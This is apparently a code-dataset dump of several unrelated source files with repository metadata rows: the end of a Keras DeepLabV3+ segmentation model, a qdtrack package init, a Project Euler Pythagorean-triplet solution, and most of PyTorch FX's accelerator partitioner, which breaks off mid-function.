x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, # 1!
expansion=6, block_id=6, skip_connection=False)
x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=7, skip_connection=True)
x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=8, skip_connection=True)
x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=9, skip_connection=True)
x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=10, skip_connection=False)
x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=11, skip_connection=True)
x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
expansion=6, block_id=12, skip_connection=True)
x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=2, # 1!
expansion=6, block_id=13, skip_connection=False)
x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,
expansion=6, block_id=14, skip_connection=True)
x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,
expansion=6, block_id=15, skip_connection=True)
x = _inverted_res_block(x, filters=320, alpha=alpha, stride=1, rate=4,
expansion=6, block_id=16, skip_connection=False)
# end of feature extractor
# branching for Atrous Spatial Pyramid Pooling
# Image Feature branch
# out_shape = int(np.ceil(input_shape[0] / OS))
b4 = AveragePooling2D(pool_size=(int(np.ceil(input_shape[0] / OS)), int(np.ceil(input_shape[1] / OS))))(x)
b4 = Conv2D(256, (1, 1), padding='same',
use_bias=False, name='image_pooling')(b4)
b4 = BatchNormalization(name='image_pooling_BN', epsilon=1e-5)(b4)
b4 = Activation('relu')(b4)
b4 = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(
int(np.ceil(input_shape[0] / OS)), int(np.ceil(input_shape[1] / OS)))))(b4)
# simple 1x1
b0 = Conv2D(256, (1, 1), padding='same', use_bias=False, name='aspp0')(x)
b0 = BatchNormalization(name='aspp0_BN', epsilon=1e-5)(b0)
b0 = Activation('relu', name='aspp0_activation')(b0)
# there are only 2 branches in mobilenetV2. not sure why
if backbone == 'xception':
# rate = 6 (12)
b1 = SepConv_BN(x, 256, 'aspp1',
rate=atrous_rates[0], depth_activation=True, epsilon=1e-5)
# rate = 12 (24)
b2 = SepConv_BN(x, 256, 'aspp2',
rate=atrous_rates[1], depth_activation=True, epsilon=1e-5)
# rate = 18 (36)
b3 = SepConv_BN(x, 256, 'aspp3',
rate=atrous_rates[2], depth_activation=True, epsilon=1e-5)
# concatenate ASPP branches & project
x = Concatenate()([b4, b0, b1, b2, b3])
else:
x = Concatenate()([b4, b0])
x = Conv2D(256, (1, 1), padding='same',
use_bias=False, name='concat_projection')(x)
x = BatchNormalization(name='concat_projection_BN', epsilon=1e-5)(x)
x = Activation('relu')(x)
x = Dropout(0.1)(x)
# DeepLab v.3+ decoder
if backbone == 'xception':
# Feature projection
# x4 (x2) block
x = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(
int(np.ceil(input_shape[0] / 4)), int(np.ceil(input_shape[1] / 4)))))(x)
dec_skip1 = Conv2D(48, (1, 1), padding='same',
use_bias=False, name='feature_projection0')(skip1)
dec_skip1 = BatchNormalization(
name='feature_projection0_BN', epsilon=1e-5)(dec_skip1)
dec_skip1 = Activation('relu')(dec_skip1)
x = Concatenate()([x, dec_skip1])
x = SepConv_BN(x, 256, 'decoder_conv0',
depth_activation=True, epsilon=1e-5)
x = SepConv_BN(x, 256, 'decoder_conv1',
depth_activation=True, epsilon=1e-5)
# you can use it with arbitary number of classes
if nClasses == 21:
last_layer_name = 'logits_semantic'
else:
last_layer_name = 'custom_logits_semantic'
x = Conv2D(nClasses, (1, 1), padding='same', name=last_layer_name)(x)
x = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(input_shape[0], input_shape[1])))(x)
inputs = img_input
outputHeight = Model(inputs,x).output_shape[1]
outputWidth = Model(inputs, x).output_shape[2]
out = (Reshape((outputHeight * outputWidth, nClasses)))(x)
out = Activation('softmax')(out)
model = Model(input=inputs, output=out)
model.outputHeight = outputHeight
model.outputWidth = outputWidth
#model.summary()
return model
#if infer:
# x = Activation('softmax')(x)
#else:
# x = Reshape((input_shape[0] * input_shape[1], nClasses))(x)
# x = Activation('softmax')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
# if input_tensor is not None:
# inputs = get_source_inputs(input_tensor)
#else:
# inputs = img_input
# load weights
'''
if weights == 'pascal_voc':
if backbone == 'xception':
weights_path = get_file('deeplabv3_xception_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH_X,
cache_subdir='models')
else:
weights_path = get_file('deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH_MOBILE,
cache_subdir='models')
model.load_weights(weights_path, by_name=True)
'''
| [
"1602881391@qq.com"
] | 1602881391@qq.com |
a0ae8a8d5136d9398c96bd27dc8e2194c614cea3 | 19a2431f8473e063fcac3e2c787a4b2ef3903f20 | /qdtrack/models/roi_heads/track_heads/__init__.py | ce5fc1d664efc72a8e8f55c2cf18a98e1bb4984a | [
"Apache-2.0"
] | permissive | mageofboy/qdtrack | 9374ceae6bfa7d6444674e003ad56f4853419bf8 | 3458dffffb9a075852bf9d480f88a8e6f70ba9bf | refs/heads/master | 2023-07-22T17:33:44.516051 | 2021-07-17T03:55:12 | 2021-07-17T03:55:12 | 360,649,406 | 0 | 1 | Apache-2.0 | 2021-08-18T20:34:58 | 2021-04-22T18:46:06 | Python | UTF-8 | Python | false | false | 90 | py | from .quasi_dense_embed_head import QuasiDenseEmbedHead
__all__ = ['QuasiDenseEmbedHead'] | [
"pangjiangmiao@gmail.com"
] | pangjiangmiao@gmail.com |
e372ef2a62d72abec5ba965d40ac64c52e42e1cd | 6da9c8536378131cc28d6a9bbe2d1de7de70fbe8 | /Hackerrank/_Contests/Project_Euler/Python/pe009.py | 25a6197d9d0384d61e15f5053dfd1e8bf479f99c | [] | no_license | austinsonger/CodingChallenges | 50f61330270cb6452715e6c28ae93b4595df6aa3 | 0cdc23fb909aa06a24294d923cedd37621e56a81 | refs/heads/master | 2021-04-30T13:21:36.111770 | 2019-07-16T18:49:02 | 2019-07-16T18:49:02 | 121,293,018 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | '''
Special Pythagorean triplet
Problem 9
A Pythagorean triplet is a set of three natural
numbers, a < b < c, for which, a^2 + b^2 = c^2
For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
There exists exactly one Pythagorean triplet
for which a + b + c = 1000.
Find the product abc.
'''
__author__ = 'SUN'
if __name__ == '__main__':
for a in range(1, 333):
for b in range(a + 1, 500):
c = 1000 - a - b
if a ** 2 + b ** 2 == c ** 2:
print("a =", a, ", b =", b, ", c =", c, ', a * b * c = ', a * b
* c)
exit()
| [
"austinvernsonger@protonmail.com"
] | austinvernsonger@protonmail.com |
591f5c567067bbf1a4785cce4f3aeadf302ac753 | 46279163a543cd8820bdc38133404d79e787c5d2 | /torch/fx/experimental/accelerator_partitioner.py | 43ec348d45e6d857feec35e24007b65c58eb1108 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | erwincoumans/pytorch | 31738b65e7b998bfdc28d0e8afa7dadeeda81a08 | ae9f39eb580c4d92157236d64548b055f71cf14b | refs/heads/master | 2023-01-23T10:27:33.628897 | 2020-12-06T01:22:00 | 2020-12-06T01:23:40 | 318,930,000 | 5 | 1 | NOASSERTION | 2020-12-06T01:58:57 | 2020-12-06T01:58:56 | null | UTF-8 | Python | false | false | 41,390 | py | from torch.fx.graph_module import GraphModule
from torch.fx.node import Node, map_arg
from typing import Dict, List, Set, NamedTuple, Tuple
import torch
from torch.fx.experimental.subgraph_creation_example import split_module
import operator
from torch.fx.experimental.partitioner_utils import Partition, \
Device, PartitionerConfig, get_partition_to_latency_mapping,\
get_latency_of_partitioned_graph, NodeLatency, get_extra_size_of, \
PartitionMode
class DAGNode():
"""
DAGNode class maintains useful information for a partition (submodule).
inputs(submodule node) and outputs(submodule node).
"""
def __init__(
self,
submodule_node: Node,
input_nodes: List[Node],
output_nodes: List[Node],
logical_device_ids: List[int],
size_bytes: int
) -> None:
self.submodule_node: Node = submodule_node
self.input_nodes: List[Node] = input_nodes
self.output_nodes: List[Node] = output_nodes
self.logical_device_ids: List[int] = logical_device_ids
self.size_bytes = size_bytes
def __str__(self) -> str:
return str(self.submodule_node)
class DAG:
"""DAG class contains all the DAG nodes"""
def __init__(self) -> None:
self.nodes: List[DAGNode] = []
def create_node(
self,
submodule_node: Node,
input_nodes: List[Node],
output_nodes: List[Node],
logical_devices: List[int],
size_bytes: int
) -> None:
node = DAGNode(submodule_node, input_nodes, output_nodes, logical_devices, size_bytes)
self.nodes.append(node)
class PartitionResult(NamedTuple):
"""NameTuple used for returning DAG and a new graph module
"""
dag: DAG
module_with_submodules: GraphModule
"""Followings are some helper functions for partition manipulation"""
def reset_partition_device(partitions):
for partition in partitions:
partition.logical_device_ids = []
def combine_two_partitions(
partition_0: Partition,
partition_1: Partition,
partitions: List[Partition]
) -> None:
"""Given a list of partitions and its two partitions,
combine these two partitions into a new one appending to the partitions
and remove the previous two partitions from the list of partitions
"""
partition = Partition(len(partitions))
partition.nodes = partition_0.nodes.union(partition_1.nodes)
partition.recalculate_mem_size()
partitions.append(partition)
partitions.remove(partition_0)
partitions.remove(partition_1)
# Reorganize partitions
reorganize_partitions(partitions)
return
def set_parents_and_children(partitions: List[Partition]) -> None:
"""Given a list of partitions, mark parents and children for each partition
"""
# Go through all nodes in a partition.
# If a node's user is in other partition,
# then the other partition is this partition's children.
# This partition is the other partition's parent
for partition in partitions:
partition.children = set()
partition.parents = set()
for partition in partitions:
for node in partition.nodes:
# For each node in the current partition, find its users
users = node.users
for n in users:
# Find which the partition the user belongs to.
# Note that if the node itself is also belongs to that partition,
# that partition is not the child of the current partition
for p in partitions:
if p != partition and n in p.nodes and node not in p.nodes:
partition.children.add(p)
p.parents.add(partition)
return
def reorganize_partitions(partitions: List[Partition]) -> None:
"""Given a list of partitions, reorganzie partiton id,
its parents and its children for each partition
"""
# Rearrange partition ids
for i, partition in enumerate(partitions):
partition.partition_id = i
set_parents_and_children(partitions)
return
def get_bfs_level_partition(partitions: List[Partition]) -> None:
"""Given a list of partitions,
mark the bfs level for each partition
"""
current_level: Set[Partition] = set()
visited: Set[Partition] = set()
for partition in partitions:
# If a partition has no parent, it should be in root level
if len(partition.parents) == 0:
current_level.add(partition)
next_level: Set[Partition] = set()
level = 0
# Start bfs
while current_level:
partition = current_level.pop()
partition.bfs_level = level
visited.add(partition)
children = partition.children
for child in children:
if child not in next_level:
next_level.add(child)
if not current_level:
current_level = next_level.copy()
next_level = set()
level += 1
return
def get_node_to_partition_mapping(partitions: List[Partition]) -> Dict[Node, int]:
"""Given a list of partitions,return node to partition mapping
"""
node_to_partition: Dict[Node, int] = {}
for partition in partitions:
for node in partition.nodes:
node_to_partition[node] = partition.partition_id
return node_to_partition
def get_device_to_partitions_mapping(partitions: List[Partition], devices: List[Device]):
"""Given a list of partitions and a list of devices,
map each partition into a device.
"""
def calculate_extra_mem_bytes_needed_for(partition: Partition, partitions: List[Partition]):
all_nodes: Set[Node] = set()
for p in partitions:
all_nodes = all_nodes.union(p.nodes)
if len(all_nodes) == 0:
return partition.used_mem_bytes
all_nodes = all_nodes.union(partition.nodes)
extra_size_needed = 0
for node in partition.nodes:
extra_size_needed += get_extra_size_of(node, all_nodes)
return extra_size_needed
def find_device_for(partition: Partition):
"""Given a partition, find a logical device for the partition
The algorithm is that:
#1. sort all the devices based on left mem size
#2. put the partition on the device that has just enought mem
for that partition
"""
for d in device_to_left_mem_bytes:
extra_size_needed = calculate_extra_mem_bytes_needed_for(partition, device_to_partitions[d])
if extra_size_needed < device_to_left_mem_bytes[d]:
device_to_partitions[d].append(partition)
partition.logical_device_ids.append(d.logical_id)
device_to_left_mem_bytes[d] -= extra_size_needed
return True
return False
# logical id to device
logical_id_to_device: Dict[int, Device] = {}
# Track partitions on device
device_to_partitions: Dict[Device, List[Partition]] = {}
# Track device's left mem size
device_to_left_mem_bytes: Dict[Device, int] = {}
for d in devices:
logical_id_to_device[d.logical_id] = d
device_to_partitions[d] = []
device_to_left_mem_bytes[d] = d.available_mem_bytes
# Deal with the partitions that have a device
# Find all no device partitions
no_device_partitions = []
for partition in partitions:
if partition.logical_device_ids != []:
logical_id = partition.logical_device_ids[0]
device = logical_id_to_device[logical_id]
device_to_partitions[device] = [partition]
device_to_left_mem_bytes[device] = d.available_mem_bytes - partition.used_mem_bytes
else:
no_device_partitions.append(partition)
# Find device for each no device partition
found_device = True
for partition in no_device_partitions:
device_to_left_mem_bytes = {
d: left_mem_bytes for d, left_mem_bytes
in sorted(device_to_left_mem_bytes.items(), key=lambda item: item[1])
}
found_device = find_device_for(partition)
if not found_device:
break
return found_device
def check_dependency(partition):
visited: Set[Partition] = set([partition])
queue: List[Partition] = [partition]
while queue:
p = queue.pop(0)
for child in p.children:
if child == partition:
return True
else:
if child not in visited:
visited.add(child)
queue.append(child)
return False
class Partitioner:
"""A graph module may not fit into one device.
Partitioner class helps cut one graph into subgraphs (partitions),
so that each partition could fit into a different device.
The main function of this class is self.partition_graph.
It will partition the graph based on the scheme specified in partition_config
A DAG structure is returned
along with a new graph module with partitions as submodule nodes.
"""
def __init__(self) -> None:
self.partitions: List[Partition] = []
self.node_to_partition: Dict[Node, int] = {}
self.devices: List[Device] = []
def partition_graph(
self,
fx_module: GraphModule,
torch_module: torch.nn.Module,
partitioner_config: PartitionerConfig
) -> PartitionResult:
"""
Given the fx module, torch module and partitioner_config,
find the partitions, do the partitions,
and then return a DAG and a new fx module with submodule nodes (partitions)
"""
self.graph_module = fx_module
self.torch_module = torch_module
self.devices = partitioner_config.devices
if len(self.devices) == 0:
raise RuntimeError('No devices')
# Check if there are op nodes in the graph
nodes = self.graph_module.graph.nodes
if all(node.op in {'placeholder', 'get_attr', 'output'} for node in nodes):
raise RuntimeError('No Partition since no operations in the module')
# Calculate total size of the graph
total_size_of_graph = 0
for node in nodes:
if node.op == 'output':
break
total_size_of_graph += node.size_bytes.total_size
device_with_max_mem = max(self.devices, key=lambda d: d.available_mem_bytes)
if partitioner_config.mode == PartitionMode.aot_based:
self.aot_based_partition(
partitioner_config.node_to_partition_mapping,
partitioner_config.partition_to_logical_device_mapping
)
elif total_size_of_graph <= device_with_max_mem.available_mem_bytes:
self.find_single_partition(total_size_of_graph)
elif total_size_of_graph > sum([d.available_mem_bytes for d in self.devices]):
raise RuntimeError('Devices have no enough memory for the module')
else:
if partitioner_config.mode == PartitionMode.sparse_nn:
available_mem_bytes = self.devices[0].available_mem_bytes
if not all(device.available_mem_bytes == available_mem_bytes for device in self.devices):
raise RuntimeError('All devices must have same memory size!')
# sparse_nn_partition only support same memory size
# TODO: add different size support for sparse_nn_partition
self.sparse_nn_partition(available_mem_bytes)
elif partitioner_config.mode == PartitionMode.cost_aware:
self.cost_aware_partition(
partitioner_config.transfer_rate_bytes_per_sec,
partitioner_config.node_to_latency_mapping
)
elif partitioner_config.mode == PartitionMode.kl_based:
self.kl_based_partition(
partitioner_config.transfer_rate_bytes_per_sec,
partitioner_config.node_to_latency_mapping
)
else:
self.size_based_partition()
module_with_submodules = self.do_partition()
# The DAG contains DAGNodes with info of each partition's input nodes, output nodes
# and how partitions are connected.
dag = self.dump_dag(module_with_submodules)
ret = PartitionResult(dag, module_with_submodules)
return ret
def find_single_partition(self, total_size_of_graph) -> None:
"""Only one partition (one graph on one device)."""
partition_0 = self.create_partition()
for node in self.graph_module.graph.nodes:
if node.op == 'output':
break
partition_0.nodes.add(node)
partition_0.used_mem_bytes = total_size_of_graph
partition_0.logical_device_ids = [0]
# Get the node to partition mapping
self.node_to_partition = get_node_to_partition_mapping(self.partitions)
return
def size_based_partition(self) -> None:
"""This method is to partition the graph based on memory size.
It uses greedy approach. The result may not be the best.
The basic idea is:
Step 1:
Find a device which has enough memory to fit the first node, create a empty partition
with the size of that device.
Then keep adding the following nodes into the partition until the partition is full.
Step 2:
Repeat Step 1 until no device left
Step 3:
If some nodes are left, create a partition for each left node (single node partition).
and then try to map those partitions into logical devices with non single node partitions.
"""
def find_device_based_on_size(node) -> Device:
"""Given a node, this function is to find a logical device
that could fit the node.
"""
mem_size_needed = get_extra_size_of(node, set())
device = Device('', -1, -1)
for d in self.devices:
if d not in occupied_devices and d.available_mem_bytes >= mem_size_needed:
device = d
break
if device.available_mem_bytes < 0:
raise RuntimeError(str(node) + 'is too large to fit any device')
occupied_devices.append(device)
return device
# Track partition and its left mem size
partition_to_left_mem_bytes: Dict[Partition, int] = {}
# Track all the devices that have been used
occupied_devices: List[Device] = []
partition = self.create_partition()
for node in self.graph_module.graph.nodes:
if node.op in {'call_module', 'call_method', 'call_function'}:
# Check if there are devices left
if len(self.partitions) <= len(self.devices):
total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
# Check if the current partition is the very first partition
if partition.used_mem_bytes == 0:
# Find a device to fit the first node, return available mem size
device = find_device_based_on_size(node)
occupied_devices.append(device)
# Update partition and its left mem size
partition_to_left_mem_bytes[partition] = device.available_mem_bytes
# Update available mem for the current partitio
partition.logical_device_ids.append(device.logical_id)
else:
# The current partition is not the first partition
# Check if the current node can fit into this partition
if partition_to_left_mem_bytes[partition] < total_size_of_input_nodes:
# Check if no device is left
if len(self.partitions) == len(self.devices):
# No device left, all the partitions before are non single node partitions
non_single_node_partitions = self.partitions[:]
# Create the first single node partition for the current node
self.create_single_node_partition(node)
continue
# Some devices are still left
device = find_device_based_on_size(node)
partition = self.create_partition()
total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
partition_to_left_mem_bytes[partition] = device.available_mem_bytes
partition.logical_device_ids.append(device.logical_id)
partition.add_node(node)
partition_to_left_mem_bytes[partition] -= total_size_of_input_nodes
# No device left, create single node partitions
else:
self.create_single_node_partition(node)
reorganize_partitions(self.partitions)
# Get the node to partition mapping
self.node_to_partition = get_node_to_partition_mapping(self.partitions)
# Mapping all partitions into device
found_partition_to_device_mapping = get_device_to_partitions_mapping(self.partitions, self.devices)
if not found_partition_to_device_mapping:
raise RuntimeError("Cannot Get a Valid Partition to Logical Device Mapping")
return
def do_partition(self) -> GraphModule:
"""Return a module with submodules (partitions)."""
module_with_submodules = split_module(
self.graph_module,
self.torch_module,
lambda node: self.node_to_partition[node]
)
return module_with_submodules
def dump_dag(self, module_with_submodules: GraphModule) -> DAG:
dag = DAG()
for node in module_with_submodules.graph.nodes:
if node.op == 'output':
break
if node.op in {'placeholder', 'get_attr'}:
continue
if node.target == operator.__getitem__:
continue
input_nodes : Dict[Node, None] = {}
map_arg(node.args, lambda n: input_nodes.setdefault(n))
map_arg(node.kwargs, lambda n: input_nodes.setdefault(n))
# When a node has two or more output nodes,
# it outputs its result to 'getitem' nodes.
# Those 'getitem' nodes are the output node for this node.
# Otherwise, the output node is this node itself.
if len(node.users) > 1:
output_nodes = list(node.users)
else:
output_nodes = [node]
partition_id = int(node.name.rsplit('_', 1)[-1])
device_ids = self.partitions[partition_id].logical_device_ids
size_bytes = self.partitions[partition_id].used_mem_bytes
dag.create_node(node, list(input_nodes), output_nodes, device_ids, size_bytes)
return dag
def create_partition(self) -> Partition:
"""Create a partition and append it to self.partitions."""
partition_id = len(self.partitions)
partition = Partition(partition_id)
self.partitions.append(partition)
return partition
def create_single_node_partition(self, node):
"""Create a partition for a single node
"""
partition = self.create_partition()
partition.add_node(node)
return
def sparse_nn_partition(self, available_mem_bytes: int) -> None:
"""This method partition a sparse nn module.
It first traverse all the nodes and do the partitions based on memory size.
If the current partition has no enough memory left for a new op node
(call_module, call_method, call_function), a new partition is created.
Different from size_based_partition, when traversing cross the boundary between
non-embedding nodes and embedding nodes, a new partition is created regardlessly.
For example, if the current node is a non-embedding node but the next node is an
embedding node, a new partition is created for the next node.
After the partition, the partitions are combined as much as possible.
The rule is that a non-embedding partition only
combines with another non-embedding one.
So as the embedding partitions.
"""
def combine_partitions_based_on_size(partitions: List[Partition], available_mem_bytes: int) -> None:
"""Combining small partitions together to keep as less partitions as possible.
Here is an example of the algorithm to do this:
Assume some partitions, we first sort them based on partiiton used memory size.
[(partition_4, 1), (partition_3, 1), (partition_2, 2), (partition_1, 7), (partition_0, 9)]
The available memory is 10.
step 1: self.find_partition_to_combine_based_on_size()
First, mark bfs level for each partition
Second, look the smallest partition, partition_4: 10 - 1 = 9
It means any partition has a used memory equal or less than 9 could combine this partition
We go from the largest and selection partition_0.
Check the bfs level for two partitions, if the level difference is less than 2,
it can be combined.
Then repeat step 1.
"""
find_combination = True
while find_combination:
# Sort partitions based on memory size
sorted_partitions = sorted(partitions, key=lambda p: p.used_mem_bytes)
# Mark bfs level
get_bfs_level_partition(self.partitions)
find_combination, partitions = \
find_partition_to_combine_based_on_size(
sorted_partitions,
available_mem_bytes,
partitions
)
return
def calculate_mem_bytes_needed(p1, p2):
"""Given two partitions, calculate how many mem bytes
are needed if two partitions are combined
"""
nodes = p1.nodes.union(p2.nodes)
mem_bytes_needed = 0
for node in nodes:
mem_bytes_needed += get_extra_size_of(node, nodes)
return mem_bytes_needed
def find_partition_to_combine_based_on_size(
sorted_partitions: List[Partition],
available_mem_bytes: int,
partitions: List[Partition]
) -> Tuple[bool, List[Partition]]:
"""step 1 in combine_partition_based_on_size()"""
find_combination = False
smallest_partition = sorted_partitions.pop(0)
for p in sorted_partitions[::-1]:
if abs(smallest_partition.bfs_level - p.bfs_level) <= 1:
# Calculate how many bytes needed if combined
mem_bytes_needed = calculate_mem_bytes_needed(p, smallest_partition)
if mem_bytes_needed <= available_mem_bytes:
combine_two_partitions(p, smallest_partition, self.partitions)
partitions.remove(smallest_partition)
partitions.remove(p)
partitions.append(self.partitions[-1])
find_combination = True
break
return find_combination, partitions
def reset_partition_in_sparse_nn(partition, new_partition=True):
if in_embedding_region:
embedding_partitions.append(partition)
else:
non_embedding_partitions.append(partition)
if new_partition:
partition = self.create_partition()
partition.left_mem_bytes = available_mem_bytes
return partition
return None
def is_embedding_node(node: Node) -> bool:
"""Check if a node is an embedding node"""
if node.op == 'call_module':
submodule = self.graph_module
for atom in str(node.target).split('.'):
if not hasattr(submodule, atom):
raise RuntimeError(f'Module {submodule} has no attribute {atom}')
submodule = getattr(submodule, atom)
if 'Embedding' in str(submodule):
return True
return False
# Track embedding partitons and non-embedding partitions separately
embedding_partitions: List[Partition] = []
non_embedding_partitions: List[Partition] = []
# A Flag to check the boundary
in_embedding_region: bool = False
partition = self.create_partition()
for node in self.graph_module.graph.nodes:
if node.op in {'call_module', 'call_method', 'call_function'}:
# Check if crossing the boundary between embedding nodes and non embedding nodes
if is_embedding_node(node) != in_embedding_region:
# Crossing the boundary
# Check if the current partition is an empty partition
if partition.used_mem_bytes != 0:
# The current partition isn't an empty partition. Create a new one.
partition = reset_partition_in_sparse_nn(partition)
in_embedding_region = not in_embedding_region
total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
if total_size_of_input_nodes + partition.used_mem_bytes > available_mem_bytes:
partition = reset_partition_in_sparse_nn(partition)
total_size_of_input_nodes = get_extra_size_of(node, partition.nodes)
if total_size_of_input_nodes > available_mem_bytes:
raise RuntimeError(node.target + 'is too large to fit into a device')
partition.add_node(node)
reset_partition_in_sparse_nn(partition, new_partition=False)
# Set parents and children for partitions
set_parents_and_children(self.partitions)
# Combining non-embedding partitions
combine_partitions_based_on_size(non_embedding_partitions, available_mem_bytes)
# Combining embedding partitions
combine_partitions_based_on_size(embedding_partitions, available_mem_bytes)
total_size_of_non_embedding_partitions = 0
for partition in non_embedding_partitions:
total_size_of_non_embedding_partitions += partition.used_mem_bytes
# Check if devices are enough for all partitions
if len(embedding_partitions) > len(self.devices):
msg = 'Need ' + str(len(embedding_partitions)) + ' devices, but only ' \
+ str(len(self.devices)) + ' provided'
raise RuntimeError(msg)
occupied_devices = []
for i, partition in enumerate(embedding_partitions):
# Check if all non-embedding partitions can fit into embedding partition devices
if total_size_of_non_embedding_partitions + partition.used_mem_bytes > available_mem_bytes:
raise RuntimeError(
'partition_' +
str(partition.partition_id) +
'(embedding partition) and non embedding partitions can not fit into one device'
)
else:
# Add logical device to the partition
partition.logical_device_ids = [self.devices[i].logical_id]
occupied_devices.append(self.devices[i].logical_id)
# Add logical devices to the non_embedding_partitions
for partition in non_embedding_partitions:
partition.logical_device_ids = occupied_devices
# Get the node to partition mapping
self.node_to_partition = get_node_to_partition_mapping(self.partitions)
return
def cost_aware_partition(
self,
transfer_rate_bytes_per_sec: float,
node_to_latency_mapping: Dict[Node, NodeLatency]
) -> None:
"""This method is to partition the fx module based on the cost.
The cost is the total latency of running the whole graph.
In partitioner_utils.py, the cost model is built.
The algorithm is:
#1. At every begining, each node is a partition.
Then we map all the partitions to the devices
and calculate the cost
#2. Then try to pre-combine any two of the partitions if the two
partitions can be combined.
(the bfs level is less than 2 or two partitions are connected and
can find partition to device mapping)
See if any partition pair could reduce the current cost.
Choose the pair that shows the minimum cost and then combine them
#3. Repeat #2 until the cost cannot be reduced.
"""
def try_combining_partitions(
p0_index,
p1_index,
partitions
) -> float:
"""Given two partitions and a list of partitions, try to combine these two partitions
and see what is the cost of the modified partition list
"""
p0 = partitions[p0_index]
p1 = partitions[p1_index]
"""If two partitions' bfs level are less than 2 or two partitions are connected to each other,
then they can be combined
"""
if (abs(p0.bfs_level - p1.bfs_level) <= 1) or (p0 in p1.parents) or p0 in (p1.children):
combine_two_partitions(p0, p1, partitions)
# Check if a circular dependency exists after combining
if check_dependency(partitions[-1]):
return float('inf')
# Check if the modified partition list can be mapped to devices after combination
reset_partition_device(partitions)
found_deivce = get_device_to_partitions_mapping(partitions, self.devices)
if not found_deivce:
return float('inf')
# Calculate the new cost
partition_to_latency_mapping = get_partition_to_latency_mapping(partitions, node_to_latency_mapping)
cost = get_latency_of_partitioned_graph(partitions, partition_to_latency_mapping, transfer_rate_bytes_per_sec)
return cost
# If two partition can not be combined, the cost is inf
return float('inf')
def search_combination(
transfer_rate_bytes_per_sec,
node_to_latency_mapping
) -> bool:
"""Given transfer rate between partitions and each node's latency,
find two partitions to combine so the cost of the partitions can
be reduced.
The algorithm is :
1. Going through all the partition pairs and see
if the pair of partitions can be combined.
2. If they are combined, the cost is calculated.
3. Select the minimum cost and combine its cooresponding partition pair
"""
partition_to_latency_mapping = get_partition_to_latency_mapping(self.partitions, node_to_latency_mapping)
cost = get_latency_of_partitioned_graph(self.partitions, partition_to_latency_mapping, transfer_rate_bytes_per_sec)
if len(self.partitions) == 1:
return False
partition_pair: List[int] = []
for i in range(len(self.partitions) - 1):
for j in range(i + 1, len(self.partitions)):
# Try to combine the partition pair
# and see the new cost after combination
new_cost = try_combining_partitions(
i,
j,
self.partitions[:]
)
if new_cost <= cost:
partition_pair = [i, j]
cost = new_cost
reorganize_partitions(self.partitions)
# If a partition pair is found, combine them
if len(partition_pair) != 0:
p0 = self.partitions[partition_pair[0]]
p1 = self.partitions[partition_pair[1]]
combine_two_partitions(p0, p1, self.partitions)
get_bfs_level_partition(self.partitions)
reset_partition_device(self.partitions)
get_device_to_partitions_mapping(self.partitions, self.devices)
return len(partition_pair) != 0
for node in self.graph_module.graph.nodes:
if node.op not in {'placeholder', 'get_attr', 'output'}:
self.create_single_node_partition(node)
# Set up parent partitions and children partitions for each partition
set_parents_and_children(self.partitions)
# Get bfs level for each partition
get_bfs_level_partition(self.partitions)
find_combination = True
while find_combination:
# Search for a pair partition to generate the minimum new cost,
# then combine them
find_combination = search_combination(
transfer_rate_bytes_per_sec,
node_to_latency_mapping
)
# Make sure all partitions are set up correctly.
reorganize_partitions(self.partitions)
# Set up node to partition mapping
self.node_to_partition = get_node_to_partition_mapping(self.partitions)
return
def kl_based_partition(
self,
transfer_rate_bytes_per_sec: float,
node_to_latency_mapping: Dict[Node, NodeLatency]
) -> None:
"""This function is a cost aware partition based
on Kernighan-Lin algorithm.
First, the graph is partitioned using size_based_partition.
Then, each node is swapped with any other node in a different
partition, and at the same time, the cost is estimated after
the swapping.
For example, we have nodes n0, n1, n2, n3 and n4.
Using size_based_partition, n0 and n1 are in Partition p0.
n2, n3 and n4 in Partition p1. The current cost is esimated.
We first tried using n0 to swap with n2 from the other partiton.
Then we found swapping n0 and n2 shows a lower cost
than the current cost and it is the minimum among other pairs like
(n0, None)(This means moving n0 to Partition without swapping other nodes),
(n0, n3) and (n0, n4). We swap n0 and n2 and set the new cost
as the current cost.
Then We repeat this process for all the other nodes until all swapping pairs
are tried.
"""
def swap_nodes(n0, n1, p0, p1):
# Either n0 or n1 could be None
# That means we simply move the node
# to another partition
if n0 is not None:
p0.remove_node(n0)
p1.add_node(n0)
if n1 is not None:
p0.add_node(n1)
p1.remove_node(n1)
def try_swap_nodes(n0, n1, p0, p1, node_to_latency_mapping, transfer_rate_per_sec):
cost = float('inf')
swap_nodes(n0, n1, p0, p1)
# Reorganize partitions after swapping
reorganize_partitions(self.partitions)
# Check if there is a circular dependency after swapping
if (not check_dependency(p0)) and (not check_dependency(p1)):
reset_partition_device(self.partitions)
partition_to_latency_mapping = get_partition_to_latency_mapping(
self.partitions,
node_to_latency_mapping
)
# Check if all partitions can be mapped to logical devices after swapping
found_device = get_device_to_partitions_mapping(self.partitions, self.devices)
if not found_device:
cost = float('inf')
else:
cost = get_latency_of_partitioned_graph(
self.partitions,
partition_to_latency_mapping,
transfer_rate_bytes_per_sec
)
# Swap back and reset all partitions back to original
swap_nodes(n1, n0, p0, p1)
